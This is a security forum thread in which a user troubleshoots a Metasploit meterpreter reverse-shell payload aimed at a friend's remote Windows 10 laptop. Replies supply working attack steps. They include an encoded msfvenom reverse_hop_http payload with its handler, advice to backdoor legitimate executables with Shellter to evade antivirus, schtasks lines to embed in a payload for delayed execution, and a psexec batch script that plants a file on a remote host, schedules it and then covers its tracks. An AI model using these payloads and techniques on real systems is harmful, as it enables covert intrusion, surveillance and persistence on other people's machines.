Jump to content

metasploit and windows 10

zalim786

By zalim786
in Security

 Share

Recommended Posts

zalim786 Newbie

zalim786

Posted
Posted

Hello guys,

I am posting here for the first time but i have been following these forums for a while now.

me and my friend are trying to create a payload to hack into windows 10 and control is using metasploit.

Now we have done similar testings before on windows xp, 7 and 8.

Now in backtrack, it all worked smoothly mostly and mostly we tested over the lan but now

we want to test on windows 10 which is 200 KM away from my place. Its my friends system, he has taken windows firewall

and antivirus off, defender is also not running and all the security is down.

There is a method of getting into windows 10 using Macro, we havent tested that yet but that will be next logical step for us.

So now to the problem

We are using Kali 2.0 (i am still using windows 7 due to some tech. reasons) on my windows 7 i am running kali 2.0 using VMWARE (BRIDGED NETWORK)

so when i create payload and sent it to my friend on his windows 10, it doest open any session for me, he tried same file on his windows 7 and still metasploit opened no session for me.

Here is what i am doing

using veil-evasion i use windows/meterpreter/reverse_tcp

LHOST (my public ip)

once i tried to my open port which was 8080 when that didnt work i tried without giving any port in this first step

so after generating the file called test.exe

i opened my msfconsole and did following

-use exploits/multi/handler (duh)

-set payload windows/meterpreter/reverse_tcp

-set LHOST (my Internet Kali IP)

-set LPORT 8080

-exploit

so now its running and i gave file to my friend, he opened it in windows 10 nothing happend, he opened it in windows 7, nothing happend he opened it in even old xp and nothing happend...

now i thought ok let me try it on lan

so this time during first step i gave LHOST (internet KALI IP) with LPORT 8080

and create a filed called testlocal.exe

when i opened it on windows 10 locally it worked perfectly i got the session

so my question is, why isnt it working over the internet? i mean we have tried the app called DARKCOMET and it works on his WINDOWS xp, 7 and 8 but not on windows 10 (for obvious reasons)

but this payload isnt working on any windows at all over the internet, am i missing somethinig? am i doing something wrong?

I havent tried Macro method yet but once i have success here i will go for macro method.

any idea guys?

thanks in advance

and forgive my english :)

Link to comment
Share on other sites
digininja Grand Master

digininja

Posted
Posted

Have you got port forwarding set up on your router so the port you specify in the payload is mapped back to your machine?

Look back in the forums, debugging this has been discussed quite a few times.

Link to comment
Share on other sites
zalim786 Newbie

zalim786

Posted
  • Author
Posted

Have you got port forwarding set up on your router so the port you specify in the payload is mapped back to your machine?

Look back in the forums, debugging this has been discussed quite a few times.

yes my KALI 2 (on VMWARE) has this IP

192.168.0.5

and on my router i have 8080 port forwarded and i can also see 8080 opened on canyouseeme website....

btw i also tried with duc no-ip using reverse_tcp_dns and still no success.

i have searched the forum again and again without much success.....

Link to comment
Share on other sites
zalim786 Newbie

zalim786

Posted
  • Author
Posted

done all ports are open and working, allowing traffic

now i have realised something

i have just tried the same file on another friends laptop (he is using windows 10)

it worked even though he is very far away

so i thought okay why wouldnt it worked on my first friend so i asked my first friend to disconnect his windows 10 laptop from router he is using and connect it to internet

thought his iphone (using lte data) as he did that, it worked and it worked perfectly i was able to get connection

now is it possible that ROUTERS dont allow it? even thought his router firewall was also down and he ven opened few ports for me stil it wasnt possible

he is using this modem

hitron technologies

CVE-30360

i asked him to do it locally using his lan and as he tried it, it worked i mean this problem is so absurd that its funny

-he gets sessions from window 10 laptop using his kali 2.0 when they both are connected to same network

-when windows 10 laptop is connected his iphone LTE, I get sessions aswell

-when his windows 10 laptop is connected to his router, i dont get any sessions anymore yet he still gets from his other kali 2.0 system on same network

i mean what in that router could be stopping it?

Link to comment
Share on other sites
vailixi Newbie

vailixi

Posted
Posted (edited)

This is stupid question. But do you have port 8080 open on the Windows 10 machine?

netsh advfirewall firewall add rule name="Open Port 8080" dir=in action=allow protocol=TCP localport=9999

If you want to test your payload to see if it works. Test it without the firewall first.

I had problems about a month ago trying to shell a Windows 10 box and here's some stuff I figured out. Windows 10 has some security features that are not available in previous version of Windows. I'm not sure how it all works. Windows is will notice that your payload is trying to hook into other system processes or DLLs on the windows system. But if inject your payload into the execution flow of an legitimate application it will run just fine and Windows isn't going to notice anything fishy.

Here's something else you can do. Use a reverse_hop_http meterpreter

msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 --platform win HOPURL=http://192.168.0.184/hop.php EXTENSIONS=stdapi,priv -f raw -o
/root/Desktop/donkeypunch.raw

You can output it to whatever format you think will work. I noticed my payloads were getting flagged by security essentials and other anti-virus programs so I decided I would backdoor a legitimate executable. I did that with a program called shellter. Worked like a charm.

Keep in mind that shellter will not work with all binaries and also doesn't work every time. Sometimes you will have try backdooring the exe several time before it's successful. Shellter does a lot of stuff that is at this point technically beyond me. But you can read about it on the website. https://www.shellterproject.com/

Payload is build make available for download. Don't forget to move hop.php to your /var/www/html/ folder and start apache.

use explooit/multi/handler
set HOPURL http://192.168.0.184.hop.php
set payload windows/meterpreter/reverse_hop_http
exploit -j

Once the binary is ran on the Windows 10 machine, you should see a session. If you get a session for like 20-30 seconds and then the session dies, it's because your payload was caught by Windows 10 security features.

The great thing about this is once you build a payload like this it will work on Windows 7 or XP as well.

Also I think there's a way to bind meterpreter to edge or internet explorer with prepend migrate and masquerade as that application so it can hop the firewall that way. If there is a way to do that I would like to know it.

Edited by vailixi
Link to comment
Share on other sites
zalim786 Newbie

zalim786

Posted
  • Author
Posted

This is stupid question. But do you have port 8080 open on the Windows 10 machine?

netsh advfirewall firewall add rule name="Open Port 8080" dir=in action=allow protocol=TCP localport=9999

If you want to test your payload to see if it works. Test it without the firewall first.

I had problems about a month ago trying to shell a Windows 10 box and here's some stuff I figured out. Windows 10 has some security features that are not available in previous version of Windows. I'm not sure how it all works. Windows is will notice that your payload is trying to hook into other system processes or DLLs on the windows system. But if inject your payload into the execution flow of an legitimate application it will run just fine and Windows isn't going to notice anything fishy.

Here's something else you can do. Use a reverse_hop_http meterpreter

msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 --platform win HOPURL=http://192.168.0.184/hop.php EXTENSIONS=stdapi,priv -f raw -o
/root/Desktop/donkeypunch.raw

You can output it to whatever format you think will work. I noticed my payloads were getting flagged by security essentials and other anti-virus programs so I decided I would backdoor a legitimate executable. I did that with a program called shellter. Worked like a charm.

Keep in mind that shellter will not work with all binaries and also doesn't work every time. Sometimes you will have try backdooring the exe several time before it's successful. Shellter does a lot of stuff that is at this point technically beyond me. But you can read about it on the website. https://www.shellterproject.com/

Payload is build make available for download. Don't forget to move hop.php to your /var/www/html/ folder and start apache.

use explooit/multi/handler
set HOPURL http://192.168.0.184.hop.php
set payload windows/meterpreter/reverse_hop_http
exploit -j

Once the binary is ran on the Windows 10 machine, you should see a session. If you get a session for like 20-30 seconds and then the session dies, it's because your payload was caught by Windows 10 security features.

The great thing about this is once you build a payload like this it will work on Windows 7 or XP as well.

Also I think there's a way to bind meterpreter to edge or internet explorer with prepend migrate and masquerade as that application so it can hop the firewall that way. If there is a way to do that I would like to know it.

thanks alot for the reply, i will try it it out with my friend tomorrow.

Well yes the port 8080 was open when we were testing it but the problem ist not windows 10 security anymore, we managed to get the working session from windows 10 using

meterpreter/reverse_https and using ReverseListnerBindAddress command, we managed the connection, the problem now is something so weird that i have never

encountered it before.

So the problem is

my friend is using

hitron technologies CVE-30360 router and no matter what exploit or rat you use, this router seems super intelligent compare to other routers.
You can locally (on LAN) hack into any window through this router using metasploit but on INTERNET it seems ALMOST impossible.
these are the things we have tried so far
my friends windows 10 laptop which is 200 km away from me is connected to hitron technologies

CVE-30360 router.

So as long as it is connected to thing router, you will get no sessions on metasploit from it NONE it wont work, even darkcomet RATS (which doesnt work on window 10 anyway) wont work on older windows like xp and 7 or 8 even if all the PORTS are open all the security is down still you cant get anything from it through internet.....

but if you try metasploit and Darkcomet Rats LOCALLY, they work fine that router will allow local traffic to pass, locally you can exploit any window with metasploit

so now we thought let us disconnect out windows 10 laptop from hitron technologies CVE-30360 router and connect it to internet thought IPHONE 6 LTE tethering....

so we did that and what do you know? you get a session on metasploit, you can exploit the window 10 anyway you want, you can play around with data, cmd, webcam, keylog anythin UAC controls anything you want and when you connect it back to hitron technologies CVE-30360 everything stops and trust me all the ports are open we have tried Netcat listner, you can open backdoors yet still...

i mean i could be missing something but i really never experienced anything like this before...

Link to comment
Share on other sites
vailixi Newbie

vailixi

Posted
Posted (edited)

any also is there a way to program an payload.exe in a way that it executes like a time bomb? i mean you set a date like say

15.01.2016 and thats when it executes automatically?

i really am interested in something like that....

On Linux

Crontab

#echo new cron into cron file
echo "00 09 * * 1-5 echo hello" >> newcron
#install new cron file
crontab newcron

On Windows scheduled task

SchTasks /Create /SC DAILY /TN "The_name_of_your_task" /TR "notepad.exe" /ST 04:00

There are alot of other task schedulers. None of which I have used.

Edited by vailixi
Link to comment
Share on other sites
zalim786 Newbie

zalim786

Posted
  • Author
Posted

On Linux

Crontab

#echo new cron into cron file
echo "00 09 * * 1-5 echo hello" >> newcron
#install new cron file
crontab newcron

On Windows scheduled task

SchTasks /Create /SC DAILY /TN "The_name_of_your_task" /TR "notepad.exe" /ST 04:00

There are alot of other task schedulers. None of which I have used.

can exe file execute on given date automatically using cron?

lets say i put that exe file in USB and plug that usb in other pc and copy that exe file there

without first executing it by clicking, i just copy it and leave it there, will it automatically execute?

Link to comment
Share on other sites
zalim786 Newbie

zalim786

Posted
  • Author
Posted

No, you would have to run something to set up the scheduled task to run the script.

well thn thats something different, there are many other options to do something l ike that,

i am interested in something like that will do it all on its on an exe that will execute on its on....

Link to comment
Share on other sites
digininja Grand Master

digininja

Posted
Posted

The easiest way to do it would be to have them run a batch file which copies the exe to the drive then creates the scheduled task. This is completely non-stealthy and would require social engineering to get them to run the initial batch file but would be fairly easy to implement. You could work up from there to an exe which has your app built into it, once the exe runs it unloads the exe then creates the task.

On very old Windows boxes USB had autorun so this would be easy but that was removed.

Link to comment
Share on other sites
vailixi Newbie

vailixi

Posted
Posted

can exe file execute on given date automatically using cron?

lets say i put that exe file in USB and plug that usb in other pc and copy that exe file there

without first executing it by clicking, i just copy it and leave it there, will it automatically execute?

Call schtasks with system(). So somewhere in your payload you ad a line like this:

system("SchTasks /Create /SC DAILY /TN \"The_name_of_your_task\" /TR \"notepad.exe\" /ST 04:00");
Link to comment
Share on other sites
0phoi5 Apprentice

0phoi5

Posted
Posted (edited)

Using PSTools can do this stealthily. You need to be connected to the same network.

It shows a CMD window for a millisecond, barely noticable. Most people would think nothing of it.

You DON'T need the user's password for this, just their username. Script also covers it's tracks and automatically runs in 80 seconds time.

I cannot guarantee 100% this works in Windows 10. Tested in Windows 7 and 8. Can't remember if I got this to work when running the schtask as SYSTEM, give it a try.

Anything in [ ] needs amending.

XCOPY C:\FOO.bat \\[IP]\c$ /E /S /C /Y

set hh=%time:~0,2%
if "%hh:~,1%"=="0" set hh=%hh:~1,2%
set mm=%time:~3,2%
if "%mm:~,1%"=="0" set mm=%mm:~1,2%
set /A mm=%mm%+2
if %mm% GEQ 60 set /A mm=%mm%-60 && set /A hh=%hh%+1
if %hh% GEQ 24 set hh=00
if %mm% LSS 10 set mm=%mm%
if %hh% LSS 10 set hh=0%hh:~1,1%
set hhmm=%hh%:%mm%
echo %hhmm%

psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /create /RU [USERNAME] /SC ONCE /TN [TASK NAME] /TR c:\FOO.bat /ST %hhmm%"

Timeout 80

psexec \\[IP] -s -c -f cmd.exe /c "del C:\FOO.bat"

psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /Delete /TN [TASK NAME]"

*Edit* I see you are trying this over the net. Apologies, maybe the above isn't quite what you want. However, you could try and amend this code and try to get it to work over the net (technically, I would say it was possible), or keep in kind that you could always travel to the location of your victim system. You'd just have to be close enough to crack their WiFi.

Edited by haze1434
Link to comment
Share on other sites
0phoi5 Apprentice

0phoi5

Posted
Posted (edited)

Can't [username] be just be variable %USERNAME% and instead of actually having to know the username? Or get the username as variable and concatenate it to the command string you want to use. This might help to automate things a bit.

If you don't specify a username, the system would run FOO.bat as SYSTEM, which wouldn't give you much access to do anything.

If you just put %USERNAME%, without specifying it's value in the script, it would attempt to pull your username from your PC, which likely would mean FOO.bat wouldn't run.

*Edit*

Note - It is only for the command...

psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /create /RU [USERNAME] /SC ONCE /TN [TASK NAME] /TR c:\FOO.bat /ST %hhmm%"

... that you need to specify the %Username%.

In the FOO.bat itself, you could put %Username% as undefined, as the batch file would be running as the target user anyway.

Edited by haze1434
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...